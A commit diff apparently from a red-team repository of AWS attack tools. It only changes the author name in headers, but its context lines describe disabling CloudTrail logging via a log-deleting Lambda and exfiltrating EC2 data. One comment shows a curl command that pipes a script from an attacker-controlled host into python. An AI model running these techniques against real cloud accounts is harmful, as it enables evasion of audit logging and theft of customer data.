updates

clouds/aws/README.md

@@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
 
         :: AWS CloudTrail disruption via S3 Put notification to Lambda
         Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
-        Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+        Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
 
 usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
 
@@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
 
         :: AWS CloudTrail disruption via S3 Put notification to Lambda
         Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
-        Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+        Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
 
 [.] Will be working on Account ID: 712800000000
 [.] Step 1: Determine trail to disrupt
@@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
 
         :: exfiltrate-ec2
         Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
-        Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+        Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
 
 usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
                            [--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
@@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
 
         :: exfiltrate-ec2
         Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
-        Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+        Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
 
 [.] Using attacker's profile: default
 [.] Using victim's profile: victim-profile

clouds/aws/assume-role-helper.sh

@@ -3,7 +3,7 @@
 # This script simply calls `aws sts assume-role` using hardcoded parameters, in order
 # to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
 #
-# Mariusz B., mgeeky '19-20
+# Mariusz Banach, mgeeky '19-20
 #
 
 

clouds/aws/disruptCloudTrailByS3Lambda.py

@@ -38,7 +38,7 @@
 #   - boto3
 #   - pytest
 #
-# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+# Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
 #
 
 
@@ -427,7 +427,7 @@ def parseOptions(argv):
     print('''
         :: AWS CloudTrail disruption via S3 Put notification to Lambda
         Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
-        Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+        Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
 ''')
 
     parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')

clouds/aws/evaluate-iam-role.sh

@@ -5,7 +5,7 @@
 # policy statements. Then goes through allowed permissions to pick all of them out.
 # Finally, checks every allowed permission against a list of known troublesome ones.
 #
-# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
+# Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
 # v0.1
 #
 

clouds/aws/exfiltrate-ec2.py

@@ -33,7 +33,7 @@
 #   WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is 
 #   not recommended to use it during legal AWS Penetration Tests 
 #
-# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
+# Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
 #
  
 import sys
@@ -422,7 +422,7 @@ def parseOptions(argv):
     print('''
         :: exfiltrate-ec2
         Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
-        Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
+        Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
 ''')
 
     parser = argparse.ArgumentParser(prog = argv[0])

clouds/aws/exfiltrateLambdaTasksDirectory.py

@@ -9,7 +9,7 @@
 #
 #   $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
 #
-# Author: Mariusz B., '19, <mb@binary-offensive.com>
+# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
 #
 
 import zipfile, StringIO

clouds/aws/identifyS3Bucket.rb

@@ -3,7 +3,7 @@
 # This script leverages couple of methods in order to validate that passed
 # domain is a S3 bucket indeed.
 #
-# Mariusz B., 2019, <mb@binary-offensive.com>
+# Mariusz Banach, 2019, <mb@binary-offensive.com>
 #
 
 require 'resolv'
@@ -245,7 +245,7 @@ def main(args)
 
 	puts %{
 	:: Identifies AWS S3 Buckets via couple of methods
-	Mariusz B. 19', <mb@binary-offensive.com>
+	Mariusz Banach 19', <mb@binary-offensive.com>
 	}
 
 	if ARGV.length != 1

clouds/aws/pentest-ec2-manager/aws-manager.rb

@@ -20,7 +20,7 @@
 # Requirements:
 #   - gem "aws-sdk-ec2"
 #
-# Author: Mariusz B., '19, <mb@binary-offensive.com>
+# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
 #
 
 require 'aws-sdk-ec2'